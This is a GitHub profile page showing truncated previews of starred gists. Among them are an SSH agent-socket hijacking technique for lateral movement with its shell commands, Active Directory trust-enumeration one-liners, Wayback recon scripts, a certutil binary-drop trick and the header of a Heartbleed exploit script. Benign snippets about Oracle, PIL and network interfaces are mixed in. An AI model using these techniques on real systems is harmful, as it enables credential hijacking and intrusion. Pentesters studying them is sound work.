Skip to content

Instantly share code, notes, and snippets.

View d4rkr0o's full-sized avatar

d4rkr0o

28 followers · 96 following
  • UNAM-CERT
View GitHub Profile
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@w00tc
w00tc / 1) Active Directory One Liners
Last active August 19, 2024 22:56
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
@mhmdiaa
mhmdiaa / waybackurls.py
Last active February 23, 2025 03:46
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@mhmdiaa
mhmdiaa / waybackrobots.py
Last active February 8, 2025 06:36
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@eelsivart
eelsivart / heartbleed.py
Last active December 14, 2024 16:35 — forked from sh1n0b1/ssltest.py
Heartbleed (CVE-2014-0160) Test & Exploit Python Script
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
@kimus
kimus / cx_oracle.md
Last active September 2, 2024 18:28
Installing python cx_oracle on Ubuntu

First of all, it just seems like doing anything with Oracle is obnoxiously painful for no good reason. It's the nature of the beast I suppose. cx_oracle is a python module that allows you to connect to an Oracle Database and issue queries, inserts, updates..usual jazz.

Linux

Step 1:

sudo apt-get install build-essential unzip python-dev libaio-dev

Step 2. Click here to download the appropriate zip files required for this. You'll need:

@bradmontgomery
bradmontgomery / louie-blurred.jpg
Created July 16, 2012 21:18
A very gentle introduction to PIL
louie-blurred.jpg
@pklaus
pklaus / enumerate_interfaces.py
Last active October 1, 2024 19:51
Python: List all Network Interfaces On Computer
"""
Determine IPv4 addresses on a Linux machine via the socket interface.
Thanks @bubthegreat the changes to make it Py2/3 compatible and the helpful
code comments: https://gist.github.com/pklaus/289646#gistcomment-2396272
This version has all comments removed for brevity.
"""
import socket
import array
import struct